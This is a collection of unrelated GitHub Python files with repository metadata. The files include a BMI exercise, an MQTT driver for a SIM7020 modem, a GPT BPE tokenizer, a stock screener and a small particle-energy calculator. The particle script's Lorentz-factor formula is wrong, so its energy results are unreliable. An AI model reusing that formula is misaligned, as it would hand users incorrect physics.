aa30891b324f86fe9c6a3eeeb6a9b8ae64b7d81d
|
/ex043.py
|
3f7ab5d16e10be268d9e4f0765ca04086af2ad88
|
[] |
no_license
|
JoamirS/Exercicios-Python
|
0055c5f73b9d0fb2d5d780c620bb0c4840c7d1b8
|
09b74babdfdf7142254a8d14132859e52f7b52b6
|
refs/heads/master
| 2023-08-31T13:21:03.310332
| 2023-08-26T03:42:58
| 2023-08-26T03:42:58
| 178,745,611
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 874
|
py
|
'''
Desenvolva uma lógica que leia o peso e a altura de uma pessoa, calcule seu IMC e mostre seu status, de acordo
com a tabela abaixo:
- Abaixo de 18.5: Abaixo do Peso | - Entre 18.5 e 25: Peso ideal | 25 até 30: Sobrepeso | 30 até 40: Obesidade
- Acima de 40: Obesidade Morbida
'''
#Declarando as variáveis
print('\033[31mExemplo: KG 70\033[0;0m')
weight = float(input('Digite seu peso: KG '))
print('\033[31mExemplo: M 1.85\033[0;0m')
height = float(input('Digite sua altura: M '))
imc = weight / (height ** 2)
print('O IMC desta pessoa é {:.1f}'.format(imc))
#Declarando as condições
if imc < 18.5:
print('Você está abaixo do peso')
elif 18.5 <= imc < 25:
print('Você está na faixa de peso ideal')
elif 25 <= imc < 30:
print('Sobrepeso')
elif 30 <= imc < 40:
print('Obesidade')
elif imc >= 40:
print('Obesidade Mórbida')
|
[
"jmrsilveira@outlook.com"
] |
jmrsilveira@outlook.com
|
59a142c83b55cf70c1b11cd1a379207fea009324
|
3e97071e538e9a08d104b6937079ad2e87049028
|
/GCAT_2_1_run_analysis.py
|
760ae48f9c04298815635b92c26733b1b1306ed3
|
[] |
no_license
|
cuelee/regen
|
4f26fba4fbb5f224d4f758b80bb8ff742909ce14
|
dce9790b48c0228f4abb602b6b231908665a6ddb
|
refs/heads/master
| 2020-03-21T22:15:28.880119
| 2018-07-11T10:46:41
| 2018-07-11T10:46:41
| 139,114,849
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,361
|
py
|
######################
## Created by Cue Hyunkyu Lee
## Date Jan 17 2018
##
## import modules
import sys
import os
## Read input arguments
print("The current code is: {}".format(sys.argv[0]));
print("The number of arguments is: {}".format(len(sys.argv)));
snp_file = sys.argv[1];
catalog_dir = os.path.dirname(snp_file);
out_file = os.path.join(catalog_dir,"catalogIn1000G.txt");
tg_file = sys.argv[2];
## Read GWAS catalog snp file
print("\nStart reading snp file")
catalog_snps = [];
n = 0;
with open(snp_file,"r") as fin:
for line in fin:
splitted = line.strip();
catalog_snps.append(splitted);
n = n + 1;
print("The total number of lines: {}".format(n));
print("\nComplete reading snp file");
## set indice
catalog_dict = dict((j,i) for (i,j) in enumerate(catalog_snps));
found_vec = [False] * len(catalog_snps);
## Read VEP
print("\nStart reading tg data");
n = 0;
with open(tg_file,"r") as fin, open(out_file,"w") as fout:
for line in fin:
splitted = line.strip().split("\t");
cur_snp=splitted[1];
if ( cur_snp in catalog_dict ):
print(" ".join(map(str,splitted)),file=fout);
found_vec[catalog_dict[cur_snp]] = True;
n = n + 1;
print("The total number of founds: {}".format(n));
print("\nComplete reading TG_data");
n=0;
for i in range(len(found_vec)):
if(found_vec[i] == False):
n=n+1;
print("n = {}".format(n))
|
[
"cue.h.lee@gmail.com"
] |
cue.h.lee@gmail.com
|
32feabe5a60e6f5718692006002449e8ee5150a2
|
14825fa733275154b41452fcdb7d4a35ec897495
|
/sim7020/sim7020_mqtt.py
|
1ab17a41aa10bf44d3ece3c40f10b4209fbc81db
|
[
"MIT"
] |
permissive
|
tedchiu/am7020_raspberry
|
7865834000dbff920937a967facd797f4cd29d41
|
8b4acddb66ad056102a626cc6a5300ad98e43f0d
|
refs/heads/main
| 2023-01-10T07:48:46.212758
| 2020-11-16T06:02:22
| 2020-11-16T06:02:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,687
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# sim7020_mqtt.py
# @Author : Zack Huang ()
# @Link : zack@atticedu.com
# @Date : 2020/11/7 下午4:12:24
from random import randint
from time import time, sleep
from typing import Dict
CONN_BROKER_TIMEOUT_MS = 90
NUM_OF_SUB = 30
class SIM7020MQTT():
def __init__(self, nb):
self.sub_list = []
self.nb = nb
def newMQTT(self, server, port):
# New MQTT. refer AT CMD 11.2.1
self.nb.sendAT("+CMQNEW=\"", server, "\",", port, ",30000,1132")
if((self.nb.waitResponse(30, "+CMQNEW: 0") == 1) and (self.nb.waitResponse() == 1)):
return True
return False
def chkMQTTChOpen(self):
# New MQTT. refer AT CMD 11.2.1
self.nb.sendAT("+CMQNEW?")
if(self.nb.waitResponse(10, "+CMQNEW: 0,") == 1):
used_state = self.nb.streamGetIntBefore(',')
self.nb.streamSkipUntil('\n')
self.nb.waitResponse()
return (used_state == 1)
return False
def connMQTT(self, mqtt_id, username, password, cleansession):
# Send MQTT Connection Packet. refer AT CMD 11.2.2
self.nb.sendAT("+CMQCON=0,4,\"", mqtt_id, "\",20000,", int(cleansession), ",0,\"",
username, "\",\"", password, "\"")
return (self.nb.waitResponse(30) == 1)
def chkMQTTChConn(self):
# Send MQTT Connection Packet. refer AT CMD 11.2.2
self.nb.sendAT("+CMQCON?")
if(self.nb.waitResponse(10, "+CMQCON: 0,") == 1):
conn_state = self.nb.streamGetIntBefore(',')
self.nb.waitResponse()
return (conn_state == 1)
return False
def closeMQTTCh(self):
# Disconnect MQTT. refer AT CMD 11.2.3
self.nb.sendAT("+CMQDISCON=0")
return (self.nb.waitResponse(2) == 1)
def setSyncMode(self, value):
# Configure MQTT Synchronization Mode. refer AT CMD 11.2.14
self.nb.sendAT("+CMQTSYNC=", value)
return (self.nb.waitResponse(2) == 1)
def connBroker(self, server, port=1883, username="", password="", mqtt_id="", cleansession=True):
# Note: 超過keepalive_interval時間會自動斷開。
temp_mqtt_id = ""
if(mqtt_id == ""):
temp_mqtt_id = "sim7020_mqttid_" + str(randint(0, 65535))
else:
temp_mqtt_id = mqtt_id
startTime = time()+CONN_BROKER_TIMEOUT_MS
while(time() < startTime):
if(not self.chkMQTTChOpen()):
# Delay is used here because the SIM7020 module has a bug.
sleep(1)
self.closeMQTTCh()
if(self.setSyncMode(1)):
self.newMQTT(server, port)
continue
else:
if(not self.chkMQTTChConn()):
self.connMQTT(temp_mqtt_id, username,
password, cleansession)
continue
return True
return False
def chkConnBroker(self):
return self.chkMQTTChConn()
def publish(self, topic, msg, qos=0):
# Send MQTT Publish Packet. refer AT CMD 11.2.6
self.nb.sendAT("+CMQPUB=0,\"", topic, "\",", qos,
",0,0,", len(str(msg)), ",\"", str(msg), "\"")
return (self.nb.waitResponse(10) == 1)
def subscribe(self, topic, callback, qos=0):
if(len(self.sub_list) <= NUM_OF_SUB):
# Send MQTT Subscribe Packet. refer AT CMD 11.2.4
self.nb.sendAT("+CMQSUB=0,\"", topic, "\",", qos)
self.nb.waitResponse(10)
temp_sub = (topic, callback)
self.sub_list.append(temp_sub)
# Note: 此library有開啟MQTT Synchronization Mode,只要訂閱數量未超過設定上限(NUM_OF_SUB)都將視為訂閱成功。
return True
else:
print("Subscription limit exceeded !")
return False
def unSubscribe(self, topic):
# Send MQTT Unsubscribe Packet. refer AT CMD 11.2.5
self.nb.sendAT("+CMQUNSUB=0,\"", topic, "\"")
return (self.nb.waitResponse(10) == 1)
def procSubs(self):
if(self.nb.waitResponse(0.01, "+CMQPUB: ") == 1):
self.ParseSubMsg()
def ParseSubMsg(self):
if(self.nb.streamSkipUntil(',')):
topic = self.nb.streamGetStringBefore(',')[1:-1]
if(self.nb.streamSkipUntil('\"')):
msg = self.nb.streamGetStringBefore('\n')[:-2]
for sub in self.sub_list:
if(sub[0] == topic):
sub[1](msg)
return
print("not find topic")
|
[
"zack@atticedu.com"
] |
zack@atticedu.com
|
26d720a549d070b0a29ae849b5a1da4a78b33e17
|
6996d66c2e5438af8e9ab534a168387ec437f846
|
/ch3/queue.py
|
b0a4001b44950011ce3aa037799e2e3aef18b44c
|
[] |
no_license
|
ziwenjie/datastructuer-in-python
|
f7d69ba69fb3ddbfba4c1d113ed8dcbd23f4c788
|
eb044c04376681bb0d67456fe7d200c39af7ceea
|
refs/heads/master
| 2022-12-03T13:52:46.427379
| 2020-08-27T08:10:17
| 2020-08-27T08:10:17
| 290,450,350
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 96
|
py
|
from pythonds.basic.queue import Queue
q = Queue()
print(q.isEmpty())
q.enqueue('dog')
print(q)
|
[
"noreply@github.com"
] |
ziwenjie.noreply@github.com
|
3f225b2ed128a5ca734a39185b73e70d25f1f414
|
ecd04e18c0bc7e690e81274a401602458becf9e5
|
/scripts/test.py
|
8442a76b9b62d776df40924ec2c0efee441f0f23
|
[] |
no_license
|
abner0908/cloud_robot
|
c7b69249af672e0c68ca7927e66aaaedd7e42047
|
98e2f7b9fbce6008bd82bfcbeed1aad7f22ff830
|
refs/heads/master
| 2016-08-12T08:28:13.239680
| 2016-05-04T07:06:45
| 2016-05-04T07:06:45
| 47,419,829
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,564
|
py
|
from common import clock
class FPS:
def __init__(self):
# store the start time, end time, and total number of frames
# that were examined between the start and end intervals
self._start = None
self._end = None
self._numFrames = 0
self._window_size = 120
def __str__(self):
self.stop()
return str(self.fps())
def __float__(self):
self.stop()
return self.fps()
def start(self):
# start the timer
self._start = clock()
return self
def stop(self):
# stop the timer
self._end = clock()
def update(self):
# increment the total number of frames examined during the
# start and end intervals
self._numFrames += 1
if self._numFrames == self._window_size * 2:
self._numFrames -= 120
self._start = self._window_start
if self._numFrames == self._window_size:
self._window_start = clock()
def elapsed(self):
# return the total number of seconds between the start and
# end interval
if self._start == None or self._end == None:
raise Exception(
"to get the fps value before the fps runs start or stop function.")
return (self._end - self._start)
def fps(self):
# compute the (approximate) frames per second
return self._numFrames / self.elapsed()
if __name__ == "__main__":
fps = FPS()
print fps
|
[
"abner0908@gmail.com"
] |
abner0908@gmail.com
|
a0632e225303452902c28c5c8052bdbbf59f3fea
|
7fc11cb1ac572e46caa5d3a197ce7052d9ca0d59
|
/check_process/add_new_contrib.py
|
c3664509be50c22c61625d59db72dd29c015d78b
|
[
"Apache-2.0"
] |
permissive
|
agrogeophy/catalog
|
247ed10f6c4b256e4de296f121594a8150aef7f1
|
fcac33e4404436927fe92f03c9166e7ec459677a
|
refs/heads/master
| 2023-04-07T21:09:10.705642
| 2022-03-15T17:51:24
| 2022-03-15T17:51:24
| 292,792,330
| 2
| 3
| null | 2021-01-12T09:54:06
| 2020-09-04T08:22:53
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 3,901
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 26 18:31:14 2021
@author: Benjamin
"""
import sys
import pandas as pd
import json
import datetime
from datetime import date
import argparse
# import eml_parser
# import email
# from email import policy
# from email.parser import BytesParser
import rich.console
import rich.highlighter
import rich.pretty
DEFAULT_DB = '../db.csv'
parser = argparse.ArgumentParser(description='Process new contribution')
parser.add_argument('-csv', type=str, help='csv')
parser.add_argument('-raw', type=str, help='raw csv')
parser.add_argument('-eml_file', type=str, help='eml new contribution filename')
parser.add_argument('-db', type=str, help='db filename', default=DEFAULT_DB)
args = parser.parse_args()
def make_console(verbose):
"""
Start up the :class:`rich.console.Console` instance we'll use.
Parameters
----------
verbose : bool
Whether or not to print status messages to stderr.
"""
return rich.console.Console(stderr=True, quiet=not verbose, highlight=False)
def main():
verbose = True
console = make_console(verbose)
style = "bold blue"
try:
process(verbose, console, style)
except Exception:
style = "bold red"
console.print()
console.rule(":fire: Error messages start here :fire:", style=style)
console.print_exception()
console.rule(":fire: Error messages above :fire:", style=style)
console.print()
def process(verbose,console, style,**kargs):
csv = args.csv
db_name = args.db
db = pd.read_csv(db_name)
console.print('db before update', style=style)
console.print(db[-3:])
console.print('save a backup with date flag', style=style)
today = date.today()
console.print("Today's date:", today, style=style)
db.to_csv('../backup/' +'db_backup' + str(today) +'.csv',sep=',')
#%% read new contribution
new = pd.read_csv(csv)
print(new['id'][0], new['surname'][0], new['name'][0])
check_values(new,console,style)
check_duplicate(db,new,console,style)
add_to_db(db,new,db_name,console,style)
def check_values(new,console,style):
console.print('checking value types', style=style)
email_ck = '@'
lat_long = 'float'
contribution_type = 'Peer reviewed publication'
publication_date_ck = datetime.date
new_dict = new.to_dict()
if isinstance(new_dict['publication_date'][0], publication_date_ck):
console.print('publication_date not correct', style='bold red')
sys.exit()
if '@' not in new_dict['email'][0]:
console.print('email not correct', new_dict['email'][0], style='bold red')
sys.exit()
def check_duplicate(db,new,console,style):
console.print('checking duplicates', style=style)
unique_keys_check = ['publication_link','latitude']
db_dict = db.to_dict()
new_dict = new.to_dict()
pub_link = db['publication_link'].tolist()
if new_dict['publication_link'][0] in pub_link:
console.print('simililar DOI', style='bold red')
sys.exit()
def add_to_db(db,new,db_name,console,style):
new['id']=db['id'].max()+1
db = db.append(new)
console.print('db after update', style=style)
console.print(db[-3:])
db.to_csv(db_name,sep=',',index=False)
today = date.today()
name_backup = new['surname'][0] + new['name'][0] + str(today) + '.csv'
new.to_csv('../backup/'+ str(name_backup),sep=',',index=False)
def eml_parser():
'''
Parse directly from eml file
'''
eml_file_new_contrib = args.eml_file
with open(eml_file_new_contrib, 'rb') as fp: # select a specific email file from the list
name = fp.name # Get file name
msg = BytesParser(policy=policy.default).parse(fp)
text = msg.get_content()
fp.close()
print(text)
if __name__ == '__main__':
main()
|
[
"36472081+BenjMy@users.noreply.github.com"
] |
36472081+BenjMy@users.noreply.github.com
|
defc0969405d537025d9bf7bd5b186bcd14100b8
|
c6456a52afd45432368f25350017f3821a63f0c9
|
/hw2/part2/pytorch_pretrained_bert/tokenization_openai.py
|
605566c013f1f58d5b682401b22c8a332c47d1fe
|
[] |
no_license
|
haoen0116/Applied-Deep-Learning-HW
|
cd44d64c72c6964407dc1a7d559ae582eb50e4c6
|
b315dce215a008a435b71e44761f468536fb6e4e
|
refs/heads/master
| 2022-11-18T14:48:04.031224
| 2019-09-09T07:21:51
| 2019-09-09T07:21:51
| 207,227,238
| 0
| 1
| null | 2022-10-30T07:23:18
| 2019-09-09T04:58:15
|
Python
|
UTF-8
|
Python
| false
| false
| 13,592
|
py
|
# coding=utf-8
# Copyright 2018 The Open AI Team Authors and The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenization classes for OpenAI GPT."""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
import logging
import os
import re
import sys
from io import open
from tqdm import tqdm
from .file_utils import cached_path
from .tokenization import BasicTokenizer
logger = logging.getLogger(__name__)
PRETRAINED_VOCAB_ARCHIVE_MAP = {
'openai-gpt': "https://s3.amazonaws.com/models.huggingface.co/bert/openai-gpt-vocab.json",
}
PRETRAINED_MERGES_ARCHIVE_MAP = {
'openai-gpt': "https://s3.amazonaws.com/models.huggingface.co/bert/openai-gpt-merges.txt",
}
PRETRAINED_VOCAB_POSITIONAL_EMBEDDINGS_SIZE_MAP = {
'openai-gpt': 512,
}
VOCAB_NAME = 'vocab.json'
MERGES_NAME = 'merges.txt'
SPECIAL_TOKENS_NAME = 'special_tokens.txt'
def get_pairs(word):
"""
Return set of symbol pairs in a word.
word is represented as tuple of symbols (symbols being variable-length strings)
"""
pairs = set()
prev_char = word[0]
for char in word[1:]:
pairs.add((prev_char, char))
prev_char = char
return pairs
def text_standardize(text):
"""
fixes some issues the spacy tokenizer had on books corpus
also does some whitespace standardization
"""
text = text.replace('—', '-')
text = text.replace('–', '-')
text = text.replace('―', '-')
text = text.replace('…', '...')
text = text.replace('´', "'")
text = re.sub(r'''(-+|~+|!+|"+|;+|\?+|\++|,+|\)+|\(+|\\+|\/+|\*+|\[+|\]+|}+|{+|\|+|_+)''', r' \1 ', text)
text = re.sub(r'\s*\n\s*', ' \n ', text)
text = re.sub(r'[^\S\n]+', ' ', text)
return text.strip()
class OpenAIGPTTokenizer(object):
"""
BPE tokenizer. Peculiarities:
- lower case all inputs
- uses SpaCy tokenizer and ftfy for pre-BPE tokenization if they are installed, fallback to BERT's BasicTokenizer if not.
- argument special_tokens and function set_special_tokens:
can be used to add additional symbols (ex: "__classify__") to a vocabulary.
"""
@classmethod
def from_pretrained(cls, pretrained_model_name_or_path, cache_dir=None, *inputs, **kwargs):
"""
Instantiate a PreTrainedBertModel from a pre-trained model file.
Download and cache the pre-trained model file if needed.
"""
if pretrained_model_name_or_path in PRETRAINED_VOCAB_ARCHIVE_MAP:
vocab_file = PRETRAINED_VOCAB_ARCHIVE_MAP[pretrained_model_name_or_path]
merges_file = PRETRAINED_MERGES_ARCHIVE_MAP[pretrained_model_name_or_path]
special_tokens_file = None
else:
vocab_file = os.path.join(pretrained_model_name_or_path, VOCAB_NAME)
merges_file = os.path.join(pretrained_model_name_or_path, MERGES_NAME)
special_tokens_file = os.path.join(pretrained_model_name_or_path, SPECIAL_TOKENS_NAME)
if not os.path.exists(special_tokens_file):
special_tokens_file = None
else:
logger.info("loading special tokens file {}".format(special_tokens_file))
# redirect to the cache, if necessary
try:
resolved_vocab_file = cached_path(vocab_file, cache_dir=cache_dir)
resolved_merges_file = cached_path(merges_file, cache_dir=cache_dir)
print('DDDDDDDDDDDDDDDDDDDDDDDDD', resolved_vocab_file)
print('ddddddddddddddddddddddd', resolved_merges_file)
except EnvironmentError:
logger.error(
"Model name '{}' was not found in model name list ({}). "
"We assumed '{}' was a path or url but couldn't find files {} and {} "
"at this path or url.".format(
pretrained_model_name_or_path,
', '.join(PRETRAINED_VOCAB_ARCHIVE_MAP.keys()),
pretrained_model_name_or_path,
vocab_file, merges_file))
return None
if resolved_vocab_file == vocab_file and resolved_merges_file == merges_file:
logger.info("loading vocabulary file {}".format(vocab_file))
logger.info("loading merges file {}".format(merges_file))
else:
logger.info("loading vocabulary file {} from cache at {}".format(
vocab_file, resolved_vocab_file))
logger.info("loading merges file {} from cache at {}".format(
merges_file, resolved_merges_file))
if pretrained_model_name_or_path in PRETRAINED_VOCAB_POSITIONAL_EMBEDDINGS_SIZE_MAP:
# if we're using a pretrained model, ensure the tokenizer wont index sequences longer
# than the number of positional embeddings
max_len = PRETRAINED_VOCAB_POSITIONAL_EMBEDDINGS_SIZE_MAP[pretrained_model_name_or_path]
kwargs['max_len'] = min(kwargs.get('max_len', int(1e12)), max_len)
# Instantiate tokenizer.
if special_tokens_file and 'special_tokens' not in kwargs:
special_tokens = open(special_tokens_file, encoding='utf-8').read().split('\n')[:-1]
else:
special_tokens = kwargs.pop('special_tokens', [])
tokenizer = cls(resolved_vocab_file, resolved_merges_file, special_tokens=special_tokens, *inputs, **kwargs)
return tokenizer
def __init__(self, vocab_file, merges_file, special_tokens=None, max_len=None):
try:
import ftfy
import spacy
self.nlp = spacy.load('en', disable=['parser', 'tagger', 'ner', 'textcat'])
self.fix_text = ftfy.fix_text
except ImportError:
logger.warning("ftfy or spacy is not installed using BERT BasicTokenizer instead of SpaCy & ftfy.")
self.nlp = BasicTokenizer(do_lower_case=True,
never_split=special_tokens if special_tokens is not None else [])
self.fix_text = None
self.max_len = max_len if max_len is not None else int(1e12)
self.encoder = json.load(open(vocab_file, encoding="utf-8"))
self.decoder = {v:k for k,v in self.encoder.items()}
merges = open(merges_file, encoding='utf-8').read().split('\n')[1:-1]
merges = [tuple(merge.split()) for merge in merges]
self.bpe_ranks = dict(zip(merges, range(len(merges))))
self.cache = {}
self.set_special_tokens(special_tokens)
def __len__(self):
return len(self.encoder) + len(self.special_tokens)
def set_special_tokens(self, special_tokens):
""" Add a list of additional tokens to the encoder.
The additional tokens are indexed starting from the last index of the
current vocabulary in the order of the `special_tokens` list.
"""
if not special_tokens:
self.special_tokens = {}
self.special_tokens_decoder = {}
return
self.special_tokens = dict((tok, len(self.encoder) + i) for i, tok in enumerate(special_tokens))
self.special_tokens_decoder = {v:k for k, v in self.special_tokens.items()}
if self.fix_text is None:
# Using BERT's BasicTokenizer: we can update the tokenizer
self.nlp.never_split = special_tokens
logger.info("Special tokens {}".format(self.special_tokens))
def bpe(self, token):
word = tuple(token[:-1]) + (token[-1] + '</w>',)
if token in self.cache:
return self.cache[token]
pairs = get_pairs(word)
if not pairs:
return token+'</w>'
while True:
bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float('inf')))
if bigram not in self.bpe_ranks:
break
first, second = bigram
new_word = []
i = 0
while i < len(word):
try:
j = word.index(first, i)
new_word.extend(word[i:j])
i = j
except:
new_word.extend(word[i:])
break
if word[i] == first and i < len(word)-1 and word[i+1] == second:
new_word.append(first+second)
i += 2
else:
new_word.append(word[i])
i += 1
new_word = tuple(new_word)
word = new_word
if len(word) == 1:
break
else:
pairs = get_pairs(word)
word = ' '.join(word)
if word == '\n </w>':
word = '\n</w>'
self.cache[token] = word
return word
def tokenize(self, text):
""" Tokenize a string. """
split_tokens = []
if self.fix_text is None:
# Using BERT's BasicTokenizer
text = self.nlp.tokenize(text)
for token in text:
split_tokens.extend([t for t in self.bpe(token).split(' ')])
else:
# Using SpaCy & ftfy (original tokenization process of OpenAI GPT)
text = self.nlp(text_standardize(self.fix_text(text)))
for token in text:
split_tokens.extend([t for t in self.bpe(token.text.lower()).split(' ')])
return split_tokens
def convert_tokens_to_ids(self, tokens):
""" Converts a sequence of tokens into ids using the vocab. """
ids = []
if isinstance(tokens, str) or (sys.version_info[0] == 2 and isinstance(tokens, unicode)):
if tokens in self.special_tokens:
return self.special_tokens[tokens]
else:
return self.encoder.get(tokens, 0)
for token in tokens:
if token in self.special_tokens:
ids.append(self.special_tokens[token])
else:
ids.append(self.encoder.get(token, 0))
if len(ids) > self.max_len:
logger.warning(
"Token indices sequence length is longer than the specified maximum "
" sequence length for this OpenAI GPT model ({} > {}). Running this"
" sequence through the model will result in indexing errors".format(len(ids), self.max_len)
)
return ids
def convert_ids_to_tokens(self, ids, skip_special_tokens=False):
"""Converts a sequence of ids in BPE tokens using the vocab."""
tokens = []
for i in ids:
if i in self.special_tokens_decoder:
if not skip_special_tokens:
tokens.append(self.special_tokens_decoder[i])
else:
tokens.append(self.decoder[i])
return tokens
def decode(self, ids, skip_special_tokens=False, clean_up_tokenization_spaces=False):
"""Converts a sequence of ids in a string."""
tokens = self.convert_ids_to_tokens(ids, skip_special_tokens=skip_special_tokens)
out_string = ''.join(tokens).replace('</w>', ' ').strip()
if clean_up_tokenization_spaces:
out_string = out_string.replace('<unk>', '')
out_string = out_string.replace(' .', '.').replace(' ?', '?').replace(' !', '!').replace(' ,', ',').replace(' ,', ','
).replace(" n't", "n't").replace(" 'm", "'m").replace(" 're", "'re").replace(" do not", " don't"
).replace(" 's", "'s").replace(" t ", "'t ").replace(" s ", "'s ").replace(" m ", "'m "
).replace(" 've", "'ve")
return out_string
def save_vocabulary(self, vocab_path):
"""Save the tokenizer vocabulary and merge files to a directory."""
if not os.path.isdir(vocab_path):
logger.error("Vocabulary path ({}) should be a directory".format(vocab_path))
return
vocab_file = os.path.join(vocab_path, VOCAB_NAME)
merge_file = os.path.join(vocab_path, MERGES_NAME)
special_tokens_file = os.path.join(vocab_path, SPECIAL_TOKENS_NAME)
with open(vocab_file, 'w', encoding='utf-8') as f:
f.write(json.dumps(self.encoder, ensure_ascii=False))
index = 0
with open(merge_file, "w", encoding="utf-8") as writer:
writer.write(u'#version: 0.2\n')
for bpe_tokens, token_index in sorted(self.bpe_ranks.items(), key=lambda kv: kv[1]):
if index != token_index:
logger.warning("Saving vocabulary to {}: BPE merge indices are not consecutive."
" Please check that the tokenizer is not corrupted!".format(merge_file))
index = token_index
writer.write(' '.join(bpe_tokens) + u'\n')
index += 1
with open(special_tokens_file, 'w', encoding='utf-8') as writer:
for token in sorted(self.special_tokens.keys(), key=lambda kv: kv[1]):
writer.write(token + u'\n')
return vocab_file, merge_file, special_tokens_file
|
[
"hao.en0116@gmail.com"
] |
hao.en0116@gmail.com
|
e47a993956b0cf5a138d15c01e3ad44563245394
|
023167de90034d0ac4e3695db5d0fc419e298247
|
/flash_examples/serve/translation/inference_server.py
|
f8f9c8dbce012db0f244cc5b81026cd00ef424f8
|
[
"Apache-2.0"
] |
permissive
|
dlangerm/lightning-flash
|
9e66e90f86d597d362e5c307e391b623f509c092
|
892f7594fff40ebc4333b62a5c4e73b02549fb82
|
refs/heads/master
| 2023-08-06T22:11:56.467679
| 2021-09-29T11:00:22
| 2021-09-29T11:00:22
| 406,909,766
| 0
| 0
|
Apache-2.0
| 2021-09-15T20:04:16
| 2021-09-15T20:04:15
| null |
UTF-8
|
Python
| false
| false
| 754
|
py
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flash.text import TranslationTask
model = TranslationTask.load_from_checkpoint("https://flash-weights.s3.amazonaws.com/translation_model_en_ro.pt")
model.serve()
|
[
"noreply@github.com"
] |
dlangerm.noreply@github.com
|
0f3329dce80da79fcd9ee3bdafee4cb57796d80a
|
158bafd98b710ab36ef63055016ff2e085ea9b41
|
/index6m.py
|
5b4e5f3b76d29fd880093b89aef7328b1cc19d29
|
[] |
no_license
|
gestinf/StockScreeningScript
|
02b2f6647d78c8038223658ab375ef055fb34b28
|
69420a7dfe9a6b56bd7e5fce682dee1cf1362306
|
refs/heads/master
| 2023-02-08T16:42:03.105653
| 2021-01-03T18:50:27
| 2021-01-03T18:50:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 554
|
py
|
import yfinance as yf
import datetime as dt
import pandas as pd
def sixMonthIndex(tickers):
start = dt.datetime.today() - dt.timedelta(180)
end = dt.datetime.today()
cl_price = pd.DataFrame()
for ticker in tickers:
cl_price[ticker]= yf.download(ticker, start, end, period = "6mo")["Adj Close"]
finalList = cl_price.iloc[-1] / cl_price.iloc[0]
finalList.sort_values(ascending = False, inplace = True)
print("6 month Index")
print(finalList)
finalList = finalList[:len(finalList)//3]
return finalList
|
[
"noreply@github.com"
] |
gestinf.noreply@github.com
|
2b1820b38378e49a3440992c21de43a88a98b68b
|
e2e2c0abaa3e3c861270fa2b920692a3ab86a8e0
|
/particle.py
|
b922f75391d388cc62946ef8c6c6435c33fd492f
|
[
"WTFPL"
] |
permissive
|
Super-Baleine/ENERGY
|
02eddb723b33044c973549033b6c68089df6d13c
|
cb5659a405bbac12a8dec77a624fbedf60ca028d
|
refs/heads/master
| 2020-09-14T15:00:45.467711
| 2016-11-13T21:33:55
| 2016-11-13T21:33:55
| 73,516,234
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,258
|
py
|
# -*- coding: utf-8 -*-
## THESE PROGRAMS ALLOW YOU TO CALCULATE
## THE ENERGY OF A LIQUID, PARTICULE
## AND MAYBE SOME OTHERS THINGS NOT CODED YET
##LICENSE : DO WHAT THE FUCK YOU WANT
## ./particle.py argv1 argv2 --> argv1: speed particle && argv2: particle's mass
import sys,math
args=len(sys.argv)
if args != 3:
print("There isn't enough or too much arguments.\
\nYou have to give exactly two arguments.\n\n\
The first argument is the speed of the particle\n\
And the second argument is the mass of the particle.\
\nExiting...")
sys.exit()
pass
def lorentzian_factor(v, c):
y=1/(((1-v*2)/(c*2))*0.5)
return float(y)
pass
def impulsion(y,m,v):
p=y*m*v
return float(p)
pass
def energy_computing(m, c, p):
m=math.pow(m, 2)
cc=math.pow(c, 4)
pp=math.pow(p, 2)
c=math.pow(c, 2)
EE=((m*cc)+pp*c)
EE=float(EE)
return EE
pass
v=float(sys.argv[1]) #v is the speed of the particle
m=float(sys.argv[2]) #mass of the particle
c=float(299792458) #Fiat lux!
y=lorentzian_factor(v,c)
y=float(y)
print("The lorentzian factor is : " + str(y))
p=impulsion(y,m,v)
print("The impulsion is : " + str(p))
energy=energy_computing(m,c,p)
print("E²=" + str(energy) + "")
print("Therefore, we have :\n\
E="+ str(math.sqrt(float(energy))))
sys.exit()
|
[
"paul.feuvraux@protonmail.ch"
] |
paul.feuvraux@protonmail.ch
|
39871474d306c16ceeeb0dd60dee92f61d97dd91
|
2478ed986c07760558be1a13fd6f3aada6fc34dd
|
/bin/python-config
|
873d249504304d1d1601c3c50eac930c19521f1a
|
[] |
no_license
|
Catravine/trydjango19
|
ac5789d699277cd4252ad67e301427a240aecb3d
|
382b67c5a9686f5355af2c83a46aad71e992d22b
|
refs/heads/master
| 2021-01-12T05:07:58.170432
| 2017-01-02T21:31:46
| 2017-01-02T21:31:46
| 77,861,941
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,353
|
#!/Users/carolinecourtney/trydjango19/bin/python
import sys
import getopt
import sysconfig
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
'ldflags', 'help']
if sys.version_info >= (3, 2):
valid_opts.insert(-1, 'extension-suffix')
valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
valid_opts.append('configdir')
def exit_with_usage(code=1):
sys.stderr.write("Usage: {0} [{1}]\n".format(
